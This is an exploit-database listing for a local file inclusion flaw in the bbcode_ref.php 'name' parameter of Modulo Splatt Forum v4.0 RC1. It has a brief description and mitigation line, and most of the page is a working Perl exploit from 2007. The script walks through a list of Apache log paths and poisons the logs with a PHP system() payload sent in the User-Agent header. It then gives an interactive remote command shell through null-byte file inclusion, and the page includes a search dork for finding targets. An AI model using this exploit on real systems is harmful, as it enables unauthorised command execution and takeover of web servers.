header-logo
Suggest Exploit
vendor:
Splatt Forum
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Local File Inclusion
CWE
Product Name: Splatt Forum
Affected Version From: Modulo Splatt Forum v4.0 RC1
Affected Version To: Modulo Splatt Forum v4.0 RC1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit

This exploit allows an attacker to include local files on the server by manipulating the 'name' parameter in the 'bbcode_ref.php' script of Modulo Splatt Forum v4.0 RC1. The vulnerable code can be found on line 17 and 19 of the script. By including certain files, an attacker can potentially view sensitive information such as log files.

Mitigation:

Apply patches or updates provided by the vendor. Additionally, ensure that user input is properly validated and sanitized to prevent any malicious file inclusion.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
# D.Script: http://sourceforge.net/projects/splattforum/
# V.Code
# $module_name = $name;   <<<-------- Line : 17
#
# include("modules/".$module_name."/functions.php");  <<<-------- Line : 19
# Dork: "Splatt Forum©"
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
use IO::Socket;
use LWP::Simple;
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3){
print "
##############################################################################
Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
          Usage: Gold.pl [VicTim] /modules/Forum/ [apachepath]
    Example: GolD.pl victim.com /modules/Forum/ ../logs/error.log
          Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
                 Discovered & Coded by : GolD_M = [Mahmood_ali]
##############################################################################
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."bbcode_ref.php?name=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2007-03-19]

Navigation

Suggest Exploit

Services By CQR